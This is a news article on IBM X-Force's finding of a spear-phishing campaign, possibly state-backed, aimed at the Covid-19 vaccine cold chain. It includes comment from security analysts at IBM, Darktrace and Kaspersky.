Elements of the international vaccine supply chain are being targeted by a worldwide phishing campaign that is probably the work of a nation state-backed cyber attacker, according to IBM Security’s X-Force unit.
This development comes hot on the heels of a global alert issued by Interpol to its 194 member states, warning that malicious actors were tooling up to target organisations associated with Covid-19 vaccines.
The ongoing campaign is targeting organisations closely associated with the cold chain – part of the vaccine supply chain that ensures the safe preservation of vaccines in temperature-controlled environments during transit.
The cold chain will be critical for the deployment of two of the most promising Covid-19 vaccines, that developed by Pfizer/BioNTech, which needs to be kept at -70°C, and that developed by Moderna, which needs to be kept at -20°C.
The X-Force team said its analysis pointed to a “calculated operation” starting in September, spanning six countries and targeting organisations associated with international vaccine alliance Gavi’s Cold Chain Equipment Optimisation Platform (CCEOP).
It was unable to precisely attribute the campaign, but said that both precision targeting of key executives at relevant organisations bore the “potential hallmarks of nation-state tradecraft”.
IBM senior strategic cyber threat analyst Claire Zaboeva wrote: “While attribution is currently unknown, the precision targeting and nature of the specific targeted organisations potentially point to nation-state activity.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets. Likewise, insight into the transport of a vaccine may present a hot black-market commodity. However, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely to be a high-value and high-priority nation-state target.”
According to IBM X-Force, the attacker has been impersonating an executive at Haier Biomedical, a cold chain specialist, to target organisations including the European Commission’s Directorate General for Taxation and Customs Union, and companies in the energy, manufacturing, website creation and software and internet security sectors.
The spear-phishing emails targeted, in the main, executives in sales, procurement, IT and finance departments, but in some instances people in other parts of the organisation, too.
The subject lines are requests for quotations related to the CCEOP programme, but the emails instead contain malicious HTML attachments that open locally, prompting their victims to enter their credentials in order to view the file.
Their aim is almost certainly to harvest credentials, and so gain future access to corporate networks and data on vaccine distribution processes, methods and plans, such as information on how governments will get the Covid-19 vaccine into the hands of national health services.
Max Heinemeyer, director of threat hunting at Darktrace, said attacking the vaccine supply chain was likely to be easier for the perpetrators than going after the core targets in the healthcare sector.
“This particular effort to disrupt vaccine research and development confirms that the barrier between the ‘cyber’ and ‘physical’ supply chains has all but dissolved,” he said. “Attacks today can start in the inbox and end up disrupting the delivery chain of a critical vaccine or service.
“A single phishing attack is easy to conduct, but executing an orchestrated spear-phishing campaign against high-profile targets like this shows a lot of sophistication. The attack appears broad and sophisticated – broader than typical cyber crime campaigns that aim for quick monetisation.”
Although the goals of the campaign are, at this stage, merely speculation, Heinemeyer suggested that information about the physical whereabouts of vaccines that need to be kept extremely cold could be useful data for many nation states.
The fact that the campaign has been going on for some time is also a concern, he added. “Organisations need to get much better at detecting unusual digital activity at a far earlier stage, using cutting-edge defence technology – particularly artificial intelligence – across the entirety of their digital infrastructure,” he said.
Maria Namestnikova, head of Kaspersky’s Global Research and Analysis Team (GReAT) in Russia, said: “Threat actors are continuing to pivot and exploit the Covid-19 pandemic to carry out highly advanced cyber attacks with this latest attack on the Covid-19 vaccine. Recently, Kaspersky and several other cyber security companies have noted a growing interest on the part of APT threat actors in vaccine developments.
“During the first six months of research on a Covid-19 vaccine, there were only messages from Western intelligence agencies on the WellMess attacks against drug developers. Now, in just the past few weeks, the cyber security community has reported attempts to compromise researchers in the US, South Korea, Canada, France and India.
“Some of this activity is reported to have been linked to North Korean actors. In general, we believe that interest from APT actors in vaccine development will continue to grow, and that these attacks will be leveraged as part of a geopolitical strategy. Thus, false flags, for example, email addresses with a .ru domain – a technique already used by some threat actors – may be used to try to deflect suspicion from the attackers, leading to potential geopolitical disputes.”
IBM’s Zaboeva added: “IBM Security X-Force urges companies in the Covid-19 supply chain – from research of therapies, healthcare delivery to distribution of a vaccine – to be vigilant and remain on high alert during this time.
“Governments have already warned that foreign entities are likely to attempt to conduct cyber espionage to steal information about vaccines. Today, in conjunction with this blog, DHS CISA is issuing an alert encouraging organisations associated with the storage and transport of a vaccine to review this research and recommended best practices to remain vigilant.”